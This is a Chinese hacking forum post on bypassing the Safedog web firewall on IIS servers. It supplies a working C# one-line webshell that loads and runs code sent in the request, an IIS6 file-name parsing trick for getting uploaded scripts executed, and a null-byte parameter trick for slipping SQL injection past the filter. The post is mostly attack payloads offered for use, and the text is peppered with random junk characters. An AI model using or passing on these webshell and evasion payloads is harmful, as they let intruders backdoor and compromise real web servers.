找回密码
 立即注册
查看: 2657|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1、绕过IIS安全狗的一句话。
8 x$ m. M9 M, Y前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
/ f5 h! Q4 h& ^+ D  {. x8 i<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。& f" g0 t; ?* v( r6 g

/ u0 o$ S9 A9 w8 ?8 [- @2、IIS6.0解析漏洞遇到安全狗。8 W, A, ?1 {8 Q/ N9 \3 [' U7 _
文件名为
$ I- `$ R: Z. C+ Q3 K" Y% {http://www.xxxxx.com/sh3llc0de.asp;1.jpg& m4 e' Q! s  h# r* J1 n
; f* h- J0 g8 ?# O9 ]& F0 S) K# m
这样的会被IIS安全狗果断屏蔽。$ t# p, F. d& Q4 A! g( C
改成如下名称,IIS6一样会解析:  t: Q5 b& E$ q& f. S
www.xxxxx.com/;1.asp;1.jpg5 W/ R0 ^' w7 ]- ?- d- U4 Y

" ?0 n5 i# x& u5 z% b3、安全狗的注入绕过。
2 p. q3 v2 D( s( ?, W( f, O常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
, i" x% r2 w4 X9 i但如果:
/ Q, K: A* l8 c, @r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1! H; Q7 s! u1 @$ u. [* G
就可以成功绕过了。7 E+ I0 B: O: f1 c5 `! ]
* u/ i% F+ ]" D! c8 W6 \! w, x

  C" ^# L, b. L/ |; Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表